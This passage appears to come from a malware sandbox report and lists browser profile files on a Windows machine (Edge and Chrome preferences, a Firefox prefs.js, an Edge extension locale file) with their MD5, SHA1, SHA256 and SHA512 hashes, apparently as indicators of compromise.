SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dpu1uz4v.default-release\prefs.js

MD5 6c4dd33bdf211d077703ab13651bf7c7
SHA1 1075416e0c414265812279c5743e7b19e94c0e21
SHA256 f5b8f752eb9b01a589db7382f356c6aad0aecacd1ce79fcc2ec4fb138baeb7b8
SHA512 b4dbfdd81e6be057e9aa1da1e826f42158003ac4064bd84c898fbc8397346606e9725a348fd3c33d45fe8dab131304e8f8fc4001722f7d4076ed0de98eab1526

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d4a912e0ee242f7cee43f1208a3c8c6d
SHA1 4dd9e54549e2e74dfa14f56f060a08c4bee23bbc
SHA256 a26e1fd8781182a6f97ce372c3c7402257f9af8217b111d056777bfdf4f8fe14
SHA512 5db4726422268955538afb303d19568cbefa918018c2c7c0bfe2e29c27a43b127fef4c28df095aada1a9256fe197f4169235eb25d1655fc7fb26a90dadef3a92

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 4709a3d8f14b13241fa0d959fbc80876
SHA1 490056b573e2d6092f462a3f8cb3fcb84f154301
SHA256 2a672d856295702ae21958009f1edc5d0ba85b61a002f1475e0d11c4655f4561
SHA512 11b2cff61d0d49aa2cd782d0260f4e2331764c393a624cff95150661c3ff9fb0ad2ff7bcab93e031e21c56b8eabfbb9cb4b5fcab07b440cab339120fc51998f1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bfefed9bff280f46e0ed9c6d30c449ae
SHA1 d1473fce0a62189e7f0920ff4e271135f24087e2
SHA256 ff58209d301701501415e1fe45b3f57125b2bd875386c99ef0b5b06d238cebba
SHA512 c532fcb860556dc75044623cb18d61c3f7653b71ac72b91c17aef8cacc144e959d25254dbd32aa7e2f840198353fd212305f24a6e987cc225e1f6a807dba1a9e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 6bf56baf0280c62c2f8948d576a14c5c
SHA1 5cd061f2b1e542a275fe7a58f20bce9864cee3fb
SHA256 eb64e14293241f646e0a41a3e629064b2b2721c2b19b169fa0ac12fe601317ab
SHA512 3bb41e8f1bd97c9ce982e9ee73cfd4c97e47ca9c4ed9c2bd8540bf69e53f6c52fcfc3f37ea15727004f37c6c4969c57435b80042d0f9e7fa4b589dd41191ef58

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 ab826a905d77d3e23a545d55464e004d
SHA1 70956ccec33f7c9ac2cb0955dc00c428c4c031fc
SHA256 787345f3c951d0e276098d69327a88b13f59cef132497878021d3ebd285fe741
SHA512 17b9b109b47289b0b0861f585091f65271a4af4b211e5833f61c11f8bdec5027579f86fd61ffe249381d53b4aa53f20f72b78c4154664c2b02fc0f6159ed7cae